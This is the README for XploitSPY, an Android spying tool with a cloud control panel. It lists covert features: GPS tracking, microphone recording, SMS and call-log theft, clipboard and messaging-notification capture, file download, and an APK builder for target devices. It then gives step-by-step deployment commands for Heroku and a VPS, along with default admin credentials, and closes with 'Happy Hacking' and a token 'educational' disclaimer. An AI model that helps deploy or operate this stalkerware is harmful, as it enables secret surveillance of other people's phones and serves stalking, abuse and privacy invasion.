XploitSPY – Android Monitoring Spying Tool


XploitSPY is an Android Monitoring Spying Tool


A cloud based Android Spying or Monitoring Tool, powered by NodeJS

NOTE: Read all steps carefully to setup XploitSPY as we keep changing them as per need


  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging (WhatsApp, Facebook, Instagram, Gmail and more ….)
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing
  • Built-In APK Builder


  • Java Runtime Environment 9+
  • NodeJs
  • A Server

Installation on Heroku

Video Tutorial for Heroku Click Here

  1. Create an Account on Heroku
  2. Click Create New App in Heroku Dashboard
  3. Enter App Name and click on create an app
  4. Now install Heroku CLI on your Computer Instructions
  5. Now open your terminal and run the command git clone https://github.com/XploitWizer/XploitSPY
  6. It will download Latest codes for you in your PC
  7. Now change the directory to XploitSPY using the command cd XploitSPY
  8. Now Login into Heroku CLI using the command heroku login -i now enter your login details and hit Enter
  9. After Login run this command in terminal heroku git:remote -a appName here appName will be your app’s name that you choose while creating the app.
  10. Now run following commands in terminal to install packages
  • heroku buildpacks:add heroku/jvm

then run

  • heroku buildpacks:add heroku/nodejs
  1. Now run this command in your terminal git push heroku master, if updating the existing app or face any error run this command git push -f heroku master 1
  2. All done now it will take time to complete, after that you can visit your domain shown in terminal.

Installation on VPS or Server

Video Tutorial for VPS or Server Click Here

  1. Connect to your server via SSH
  2. Install JRE 9+
    • Debian, Ubuntu, Etc
      • sudo apt install openjdk-11-jre-headless
    • Fedora, Oracle, Red Hat, etc
      • sudo yum install java-11-openjdk-devel"
    • Windows
      • click HERE for downloads
  3. Install NodeJS Instructions Here (If you can’t figure this out, you shouldn’t really be using this)
  4. install PM2
    • sudo npm install pm2 -g
  5. Clone this repository
    • git clone https://github.com/XploitWizer/XploitSPY.git
  6. Now change to the server directory and run these commands
    • npm install <- install dependencies
    • sudo pm2 start index.js <– start the script
    • sudo pm2 startup <- to run XploitSPY on startup
  7. Default Username: admin & Default Password: password
  8. In your browser navigate to http://<SERVER IP or URL>

NOTE: XploitSPY now works only on port 80 for both web and client

It’s recommended to run XploitSPY behind a reverse proxy such as NGINX

Happy Hacking


XploitWizer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool. XploitSPY is built for Educational purposes. Use at your own risk.

Made with ❤️ By XploitWizer


Credits to D3VL for the original code base this repository is based on at L3MON